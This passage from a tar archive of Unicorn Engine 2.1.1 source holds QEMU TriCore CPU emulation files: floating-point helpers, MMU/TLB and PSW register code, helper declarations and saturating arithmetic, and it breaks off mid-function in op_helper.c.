uint32_t helper_fmsub(CPUTriCoreState *env, uint32_t r1, uint32_t r2, uint32_t r3) { uint32_t flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); float32 arg3 = make_float32(r3); float32 f_result; f_result = float32_muladd(arg1, arg2, arg3, float_muladd_negate_product, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (flags & float_flag_invalid) { arg1 = float32_squash_input_denormal(arg1, &env->fp_status); arg2 = float32_squash_input_denormal(arg2, &env->fp_status); arg3 = float32_squash_input_denormal(arg3, &env->fp_status); f_result = f_maddsub_nan_result(arg1, arg2, arg3, f_result, 1); } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_fcmp(CPUTriCoreState *env, uint32_t r1, uint32_t r2) { uint32_t result, flags; float32 arg1 = make_float32(r1); float32 arg2 = make_float32(r2); set_flush_inputs_to_zero(0, &env->fp_status); result = 1 << (float32_compare_quiet(arg1, arg2, &env->fp_status) + 1); result |= float32_is_denormal(arg1) << 4; result |= float32_is_denormal(arg2) << 5; flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } set_flush_inputs_to_zero(1, &env->fp_status); return result; } uint32_t helper_ftoi(CPUTriCoreState *env, uint32_t arg) { float32 f_arg = make_float32(arg); int32_t result, flags; result = float32_to_int32(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { if (float32_is_any_nan(f_arg)) { result = 0; } f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)result; } uint32_t helper_itof(CPUTriCoreState *env, uint32_t arg) { float32 f_result; uint32_t flags; f_result = int32_to_float32(arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_utof(CPUTriCoreState *env, uint32_t arg) { float32 f_result; uint32_t flags; f_result = uint32_to_float32(arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return (uint32_t)f_result; } uint32_t helper_ftoiz(CPUTriCoreState *env, uint32_t arg) { float32 f_arg = make_float32(arg); uint32_t result; int32_t flags; result = float32_to_int32_round_to_zero(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags & float_flag_invalid) { flags &= ~float_flag_inexact; if (float32_is_any_nan(f_arg)) { result = 0; } } if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return result; } uint32_t helper_ftouz(CPUTriCoreState *env, uint32_t arg) { float32 f_arg = make_float32(arg); uint32_t result; int32_t flags; result = float32_to_uint32_round_to_zero(f_arg, &env->fp_status); flags = f_get_excp_flags(env); if (flags & float_flag_invalid) { flags &= ~float_flag_inexact; if (float32_is_any_nan(f_arg)) { result = 0; } } else if (float32_lt_quiet(f_arg, 0, &env->fp_status)) { flags = float_flag_invalid; result = 0; } if (flags) { f_update_psw_flags(env, flags); } else { env->FPU_FS = 0; } return result; } void helper_updfl(CPUTriCoreState *env, uint32_t arg) { env->FPU_FS = extract32(arg, 7, 1) & extract32(arg, 15, 1); env->FPU_FI = (extract32(arg, 6, 1) & extract32(arg, 14, 1)) << 31; env->FPU_FV = (extract32(arg, 5, 1) & extract32(arg, 13, 1)) << 31; env->FPU_FZ = (extract32(arg, 4, 1) & extract32(arg, 12, 1)) << 31; env->FPU_FU = (extract32(arg, 3, 1) & extract32(arg, 11, 1)) << 31; /* clear FX and RM */ env->PSW &= ~(extract32(arg, 10, 1) << 26); env->PSW |= (extract32(arg, 2, 1) & extract32(arg, 10, 1)) << 26; fpu_set_state(env); } ���������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/helper.c����������������������������������������������������������0000664�0000000�0000000�00000011107�14675241067�0020533�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "fpu/softfloat-helpers.h" enum { TLBRET_DIRTY = -4, TLBRET_INVALID = -3, TLBRET_NOMATCH = -2, TLBRET_BADADDR = -1, TLBRET_MATCH = 0 }; #if defined(CONFIG_SOFTMMU) static int get_physical_address(CPUTriCoreState *env, hwaddr *physical, int *prot, target_ulong address, MMUAccessType access_type, int mmu_idx) { int ret = TLBRET_MATCH; *physical = address & 0xFFFFFFFF; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; return ret; } hwaddr tricore_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { TriCoreCPU *cpu = TRICORE_CPU(cs); hwaddr phys_addr; int prot; int mmu_idx = cpu_mmu_index(&cpu->env, false); if (get_physical_address(&cpu->env, &phys_addr, &prot, addr, MMU_DATA_LOAD, mmu_idx)) { return -1; } return phys_addr; } #endif /* TODO: Add exeption support*/ static void raise_mmu_exception(CPUTriCoreState *env, target_ulong address, int rw, int tlb_error) { } bool tricore_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType rw, int mmu_idx, bool probe, uintptr_t retaddr) { TriCoreCPU *cpu = TRICORE_CPU(cs); CPUTriCoreState *env = &cpu->env; hwaddr physical; int prot; int ret = 0; rw &= 1; ret = get_physical_address(env, &physical, &prot, address, rw, mmu_idx); // qemu_log_mask(CPU_LOG_MMU, "%s address=" TARGET_FMT_lx " ret %d physical " // TARGET_FMT_plx " prot %d\n", // __func__, (target_ulong)address, ret, physical, prot); if (ret == TLBRET_MATCH) { tlb_set_page(cs, address & TARGET_PAGE_MASK, physical & TARGET_PAGE_MASK, prot | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return true; } else { assert(ret < 0); if (probe) { return false; } raise_mmu_exception(env, address, rw, ret); cpu_loop_exit_restore(cs, retaddr); } } #if 0 static void tricore_cpu_list_entry(gpointer data, gpointer user_data) { ObjectClass *oc = data; const char *typename; char *name; typename = object_class_get_name(oc); name = g_strndup(typename, strlen(typename) - strlen("-" TYPE_TRICORE_CPU)); qemu_printf(" %s\n", name); g_free(name); } #endif #if 0 void tricore_cpu_list(void) { GSList *list; list = object_class_get_list_sorted(TYPE_TRICORE_CPU, false); qemu_printf("Available CPUs:\n"); g_slist_foreach(list, tricore_cpu_list_entry, NULL); g_slist_free(list); } #endif void fpu_set_state(CPUTriCoreState *env) { set_float_rounding_mode(env->PSW & MASK_PSW_FPU_RM, &env->fp_status); set_flush_inputs_to_zero(1, &env->fp_status); set_flush_to_zero(1, &env->fp_status); set_default_nan_mode(1, &env->fp_status); } uint32_t psw_read(CPUTriCoreState *env) { /* clear all USB bits */ env->PSW &= 0x6ffffff; /* now set them from the cache */ env->PSW |= ((env->PSW_USB_C != 0) << 31); env->PSW |= ((env->PSW_USB_V & (1 << 31)) >> 1); env->PSW |= ((env->PSW_USB_SV & (1 << 31)) >> 2); env->PSW |= ((env->PSW_USB_AV & (1 << 31)) >> 3); env->PSW |= ((env->PSW_USB_SAV & (1 << 31)) >> 4); return env->PSW; } void psw_write(CPUTriCoreState *env, uint32_t val) { env->PSW_USB_C = (val & MASK_USB_C); env->PSW_USB_V = (val & MASK_USB_V) << 1; env->PSW_USB_SV = (val & MASK_USB_SV) << 2; env->PSW_USB_AV = (val & MASK_USB_AV) << 3; env->PSW_USB_SAV = (val & MASK_USB_SAV) << 4; env->PSW = val; fpu_set_state(env); } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/helper.h����������������������������������������������������������0000664�0000000�0000000�00000016170�14675241067�0020545�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* Modified for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(uc_tricore_exit,void, env) /* Arithmetic */ DEF_HELPER_3(add_ssov, i32, env, i32, i32) DEF_HELPER_3(add64_ssov, i64, env, i64, i64) DEF_HELPER_3(add_suov, i32, env, i32, i32) DEF_HELPER_3(add_h_ssov, i32, env, i32, i32) DEF_HELPER_3(add_h_suov, i32, env, i32, i32) DEF_HELPER_4(addr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_4(addsur_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_3(sub_ssov, i32, env, i32, i32) DEF_HELPER_3(sub64_ssov, i64, env, i64, i64) DEF_HELPER_3(sub_suov, i32, env, i32, i32) DEF_HELPER_3(sub_h_ssov, i32, env, i32, i32) DEF_HELPER_3(sub_h_suov, i32, env, i32, i32) DEF_HELPER_4(subr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_4(subadr_h_ssov, i32, env, i64, i32, i32) DEF_HELPER_3(mul_ssov, i32, env, i32, i32) DEF_HELPER_3(mul_suov, i32, env, i32, i32) DEF_HELPER_3(sha_ssov, i32, env, i32, i32) DEF_HELPER_3(absdif_ssov, i32, env, i32, i32) DEF_HELPER_4(madd32_ssov, i32, env, i32, i32, i32) DEF_HELPER_4(madd32_suov, i32, env, i32, i32, i32) DEF_HELPER_4(madd64_ssov, i64, env, i32, i64, i32) DEF_HELPER_5(madd64_q_ssov, i64, env, i64, i32, i32, i32) DEF_HELPER_3(madd32_q_add_ssov, i32, env, i64, i64) DEF_HELPER_5(maddr_q_ssov, i32, env, i32, i32, i32, i32) DEF_HELPER_4(madd64_suov, i64, env, i32, i64, i32) DEF_HELPER_4(msub32_ssov, i32, env, i32, i32, i32) DEF_HELPER_4(msub32_suov, i32, env, i32, i32, i32) DEF_HELPER_4(msub64_ssov, i64, env, i32, i64, i32) DEF_HELPER_5(msub64_q_ssov, i64, env, i64, i32, i32, i32) DEF_HELPER_3(msub32_q_sub_ssov, i32, env, i64, i64) DEF_HELPER_5(msubr_q_ssov, i32, env, i32, i32, i32, i32) DEF_HELPER_4(msub64_suov, i64, env, i32, i64, i32) DEF_HELPER_3(absdif_h_ssov, i32, env, i32, i32) DEF_HELPER_2(abs_ssov, i32, env, i32) DEF_HELPER_2(abs_h_ssov, i32, env, i32) /* hword/byte arithmetic */ DEF_HELPER_2(abs_b, i32, env, i32) DEF_HELPER_2(abs_h, i32, env, i32) DEF_HELPER_3(absdif_b, i32, env, i32, i32) DEF_HELPER_3(absdif_h, i32, env, i32, i32) DEF_HELPER_4(addr_h, i32, env, i64, i32, i32) DEF_HELPER_4(addsur_h, i32, env, i64, i32, i32) DEF_HELPER_5(maddr_q, i32, env, i32, i32, i32, i32) DEF_HELPER_3(add_b, i32, env, i32, i32) DEF_HELPER_3(add_h, i32, env, i32, i32) DEF_HELPER_3(sub_b, i32, env, i32, i32) DEF_HELPER_3(sub_h, i32, env, i32, i32) DEF_HELPER_4(subr_h, i32, env, i64, i32, i32) DEF_HELPER_4(subadr_h, i32, env, i64, i32, i32) DEF_HELPER_5(msubr_q, i32, env, i32, i32, i32, i32) DEF_HELPER_FLAGS_2(eq_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eq_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eqany_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(eqany_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(lt_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(max_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ixmax, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(ixmax_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(min_b, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_bu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(min_hu, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(ixmin, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(ixmin_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) /* count leading ... */ DEF_HELPER_FLAGS_1(clo_h, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(clz_h, TCG_CALL_NO_RWG_SE, i32, i32) DEF_HELPER_FLAGS_1(cls_h, TCG_CALL_NO_RWG_SE, i32, i32) /* sh */ DEF_HELPER_FLAGS_2(sh, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_2(sh_h, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_3(sha, i32, env, i32, i32) DEF_HELPER_2(sha_h, i32, i32, i32) /* merge/split/parity */ DEF_HELPER_FLAGS_2(bmerge, TCG_CALL_NO_RWG_SE, i32, i32, i32) DEF_HELPER_FLAGS_1(bsplit, TCG_CALL_NO_RWG_SE, i64, i32) DEF_HELPER_FLAGS_1(parity, TCG_CALL_NO_RWG_SE, i32, i32) /* float */ DEF_HELPER_FLAGS_4(pack, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32, i32) DEF_HELPER_1(unpack, i64, i32) DEF_HELPER_3(fadd, i32, env, i32, i32) DEF_HELPER_3(fsub, i32, env, i32, i32) DEF_HELPER_3(fmul, i32, env, i32, i32) DEF_HELPER_3(fdiv, i32, env, i32, i32) DEF_HELPER_4(fmadd, i32, env, i32, i32, i32) DEF_HELPER_4(fmsub, i32, env, i32, i32, i32) DEF_HELPER_3(fcmp, i32, env, i32, i32) DEF_HELPER_2(qseed, i32, env, i32) DEF_HELPER_2(ftoi, i32, env, i32) DEF_HELPER_2(itof, i32, env, i32) DEF_HELPER_2(utof, i32, env, i32) DEF_HELPER_2(ftoiz, i32, env, i32) DEF_HELPER_2(ftouz, i32, env, i32) DEF_HELPER_2(updfl, void, env, i32) /* dvinit */ DEF_HELPER_3(dvinit_b_13, i64, env, i32, i32) DEF_HELPER_3(dvinit_b_131, i64, env, i32, i32) DEF_HELPER_3(dvinit_h_13, i64, env, i32, i32) DEF_HELPER_3(dvinit_h_131, i64, env, i32, i32) DEF_HELPER_FLAGS_2(dvadj, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(dvstep, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_FLAGS_2(dvstep_u, TCG_CALL_NO_RWG_SE, i64, i64, i32) DEF_HELPER_3(divide, i64, env, i32, i32) DEF_HELPER_3(divide_u, i64, env, i32, i32) /* mulh */ DEF_HELPER_FLAGS_5(mul_h, TCG_CALL_NO_RWG_SE, i64, i32, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(mulm_h, TCG_CALL_NO_RWG_SE, i64, i32, i32, i32, i32, i32) DEF_HELPER_FLAGS_5(mulr_h, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32, i32, i32) /* crc32 */ DEF_HELPER_FLAGS_2(crc32, TCG_CALL_NO_RWG_SE, i32, i32, i32) /* CSA */ DEF_HELPER_2(call, void, env, i32) DEF_HELPER_1(ret, void, env) DEF_HELPER_2(bisr, void, env, i32) DEF_HELPER_1(rfe, void, env) DEF_HELPER_1(rfm, void, env) DEF_HELPER_2(ldlcx, void, env, i32) DEF_HELPER_2(lducx, void, env, i32) DEF_HELPER_2(stlcx, void, env, i32) DEF_HELPER_2(stucx, void, env, i32) DEF_HELPER_1(svlcx, void, env) DEF_HELPER_1(svucx, void, env) DEF_HELPER_1(rslcx, void, env) /* Address mode helper */ DEF_HELPER_1(br_update, i32, i32) DEF_HELPER_2(circ_update, i32, i32, i32) /* PSW cache helper */ DEF_HELPER_2(psw_write, void, env, i32) DEF_HELPER_1(psw_read, i32, env) /* Exceptions */ DEF_HELPER_3(raise_exception_sync, noreturn, env, i32, i32) ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/tricore/op_helper.c�������������������������������������������������������0000664�0000000�0000000�00000236132�14675241067�0021240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright (c) 2012-2014 Bastian Koppelmann C-Lab/University Paderborn * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "qemu/crc32c.h" /* Exception helpers */ static void QEMU_NORETURN raise_exception_sync_internal(CPUTriCoreState *env, uint32_t class, int tin, uintptr_t pc, uint32_t fcd_pc) { CPUState *cs = env_cpu(env); /* in case we come from a helper-call we need to restore the PC */ cpu_restore_state(cs, pc, true); /* Tin is loaded into d[15] */ env->gpr_d[15] = tin; if (class == TRAPC_CTX_MNG && tin == TIN3_FCU) { /* upper context cannot be saved, if the context list is empty */ } else { helper_svucx(env); } /* The return address in a[11] is updated */ if (class == TRAPC_CTX_MNG && tin == TIN3_FCD) { env->SYSCON |= MASK_SYSCON_FCD_SF; /* when we run out of CSAs after saving a context a FCD trap is taken and the return address is the start of the trap handler which used the last CSA */ env->gpr_a[11] = fcd_pc; } else if (class == TRAPC_SYSCALL) { env->gpr_a[11] = env->PC + 4; } else { env->gpr_a[11] = env->PC; } /* The stack pointer in A[10] is set to the Interrupt Stack Pointer (ISP) when the processor was not previously using the interrupt stack (in case of PSW.IS = 0). The stack pointer bit is set for using the interrupt stack: PSW.IS = 1. */ if ((env->PSW & MASK_PSW_IS) == 0) { env->gpr_a[10] = env->ISP; } env->PSW |= MASK_PSW_IS; /* The I/O mode is set to Supervisor mode, which means all permissions are enabled: PSW.IO = 10 B .*/ env->PSW |= (2 << 10); /*The current Protection Register Set is set to 0: PSW.PRS = 00 B .*/ env->PSW &= ~MASK_PSW_PRS; /* The Call Depth Counter (CDC) is cleared, and the call depth limit is set for 64: PSW.CDC = 0000000 B .*/ env->PSW &= ~MASK_PSW_CDC; /* Call Depth Counter is enabled, PSW.CDE = 1. */ env->PSW |= MASK_PSW_CDE; /* Write permission to global registers A[0], A[1], A[8], A[9] is disabled: PSW.GW = 0. */ env->PSW &= ~MASK_PSW_GW; /*The interrupt system is globally disabled: ICR.IE = 0. The ‘old’ ICR.IE and ICR.CCPN are saved */ /* PCXI.PIE = ICR.IE */ env->PCXI = ((env->PCXI & ~MASK_PCXI_PIE_1_3) + ((env->ICR & MASK_ICR_IE_1_3) << 15)); /* PCXI.PCPN = ICR.CCPN */ env->PCXI = (env->PCXI & 0xffffff) + ((env->ICR & MASK_ICR_CCPN) << 24); /* Update PC using the trap vector table */ env->PC = env->BTV | (class << 5); cpu_loop_exit(cs); } void helper_raise_exception_sync(CPUTriCoreState *env, uint32_t class, uint32_t tin) { raise_exception_sync_internal(env, class, tin, 0, 0); } static void raise_exception_sync_helper(CPUTriCoreState *env, uint32_t class, uint32_t tin, uintptr_t pc) { raise_exception_sync_internal(env, class, tin, pc, 0); } /* Addressing mode helper */ static uint16_t reverse16(uint16_t val) { uint8_t high = (uint8_t)(val >> 8); uint8_t low = (uint8_t)(val & 0xff); uint16_t rh, rl; rl = (uint16_t)((high * 0x0202020202ULL & 0x010884422010ULL) % 1023); rh = (uint16_t)((low * 0x0202020202ULL & 0x010884422010ULL) % 1023); return (rh << 8) | rl; } uint32_t helper_br_update(uint32_t reg) { uint32_t index = reg & 0xffff; uint32_t incr = reg >> 16; uint32_t new_index = reverse16(reverse16(index) + reverse16(incr)); return reg - index + new_index; } uint32_t helper_circ_update(uint32_t reg, uint32_t off) { uint32_t index = reg & 0xffff; uint32_t length = reg >> 16; int32_t new_index = index + off; if (new_index < 0) { new_index += length; } else { new_index %= length; } return reg - index + new_index; } static uint32_t ssov32(CPUTriCoreState *env, int64_t arg) { uint32_t ret; int64_t max_pos = INT32_MAX; int64_t max_neg = INT32_MIN; if (arg > max_pos) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_pos; } else { if (arg < max_neg) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_neg; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t suov32_pos(CPUTriCoreState *env, uint64_t arg) { uint32_t ret; uint64_t max_pos = UINT32_MAX; if (arg > max_pos) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = (target_ulong)max_pos; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t suov32_neg(CPUTriCoreState *env, int64_t arg) { uint32_t ret; if (arg < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); ret = 0; } else { env->PSW_USB_V = 0; ret = (target_ulong)arg; } env->PSW_USB_AV = arg ^ arg * 2u; env->PSW_USB_SAV |= env->PSW_USB_AV; return ret; } static uint32_t ssov16(CPUTriCoreState *env, int32_t hw0, int32_t hw1) { int32_t max_pos = INT16_MAX; int32_t max_neg = INT16_MIN; int32_t av0, av1; env->PSW_USB_V = 0; av0 = hw0 ^ hw0 * 2u; if (hw0 > max_pos) { env->PSW_USB_V = (1 << 31); hw0 = max_pos; } else if (hw0 < max_neg) { env->PSW_USB_V = (1 << 31); hw0 = max_neg; } av1 = hw1 ^ hw1 * 2u; if (hw1 > max_pos) { env->PSW_USB_V = (1 << 31); hw1 = max_pos; } else if (hw1 < max_neg) { env->PSW_USB_V = (1 << 31); hw1 = max_neg; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = (av0 | av1) << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return (hw0 & 0xffff) | (hw1 << 16); } static uint32_t suov16(CPUTriCoreState *env, int32_t hw0, int32_t hw1) { int32_t max_pos = UINT16_MAX; int32_t av0, av1; env->PSW_USB_V = 0; av0 = hw0 ^ hw0 * 2u; if (hw0 > max_pos) { env->PSW_USB_V = (1 << 31); hw0 = max_pos; } else if (hw0 < 0) { env->PSW_USB_V = (1 << 31); hw0 = 0; } av1 = hw1 ^ hw1 * 2u; if (hw1 > max_pos) { env->PSW_USB_V = (1 << 31); hw1 = max_pos; } else if (hw1 < 0) { env->PSW_USB_V = (1 << 31); hw1 = 0; } env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = (av0 | av1) << 16; env->PSW_USB_SAV |= env->PSW_USB_AV; return (hw0 & 0xffff) | (hw1 << 16); } target_ulong helper_add_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 + t2; return ssov32(env, result); } uint64_t helper_add64_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { uint64_t result; int64_t ovf; result = r1 + r2; ovf = (result ^ r1) & ~(r1 ^ r2); env->PSW_USB_AV = (result ^ result * 2u) >> 32; env->PSW_USB_SAV |= env->PSW_USB_AV; if (ovf < 0) { env->PSW_USB_V = (1 << 31); env->PSW_USB_SV = (1 << 31); /* ext_ret > MAX_INT */ if ((int64_t)r1 >= 0) { result = INT64_MAX; /* ext_ret < MIN_INT */ } else { result = INT64_MIN; } } else { env->PSW_USB_V = 0; } return result; } target_ulong helper_add_h_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = sextract32(r1, 0, 16) + sextract32(r2, 0, 16); ret_hw1 = sextract32(r1, 16, 16) + sextract32(r2, 16, 16); return ssov16(env, ret_hw0, ret_hw1); } uint32_t helper_addr_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low + mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } uint32_t helper_addsur_h_ssov(CPUTriCoreState *env, uint64_t r1, uint32_t r2_l, uint32_t r2_h) { int64_t mul_res0 = sextract64(r1, 0, 32); int64_t mul_res1 = sextract64(r1, 32, 32); int64_t r2_low = sextract64(r2_l, 0, 32); int64_t r2_high = sextract64(r2_h, 0, 32); int64_t result0, result1; uint32_t ovf0, ovf1; uint32_t avf0, avf1; ovf0 = ovf1 = 0; result0 = r2_low - mul_res0 + 0x8000; result1 = r2_high + mul_res1 + 0x8000; avf0 = result0 * 2u; avf0 = result0 ^ avf0; avf1 = result1 * 2u; avf1 = result1 ^ avf1; if (result0 > INT32_MAX) { ovf0 = (1 << 31); result0 = INT32_MAX; } else if (result0 < INT32_MIN) { ovf0 = (1 << 31); result0 = INT32_MIN; } if (result1 > INT32_MAX) { ovf1 = (1 << 31); result1 = INT32_MAX; } else if (result1 < INT32_MIN) { ovf1 = (1 << 31); result1 = INT32_MIN; } env->PSW_USB_V = ovf0 | ovf1; env->PSW_USB_SV |= env->PSW_USB_V; env->PSW_USB_AV = avf0 | avf1; env->PSW_USB_SAV |= env->PSW_USB_AV; return (result1 & 0xffff0000ULL) | ((result0 >> 16) & 0xffffULL); } target_ulong helper_add_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = extract64(r1, 0, 32); int64_t t2 = extract64(r2, 0, 32); int64_t result = t1 + t2; return suov32_pos(env, result); } target_ulong helper_add_h_suov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int32_t ret_hw0, ret_hw1; ret_hw0 = extract32(r1, 0, 16) + extract32(r2, 0, 16); ret_hw1 = extract32(r1, 16, 16) + extract32(r2, 16, 16); return suov16(env, ret_hw0, ret_hw1); } target_ulong helper_sub_ssov(CPUTriCoreState *env, target_ulong r1, target_ulong r2) { int64_t t1 = sextract64(r1, 0, 32); int64_t t2 = sextract64(r2, 0, 32); int64_t result = t1 - t2; return ssov32(env, result); } uint64_t helper_sub64_ssov(CPUTriCoreState *env, uint64_t r1, uint64_t r2) { uint64_t result; int64_t ovf; result = r1 - r2; ovf = (result ^ r1) & (r1 ^ r2); env->PSW_USB_AV = (result ^ 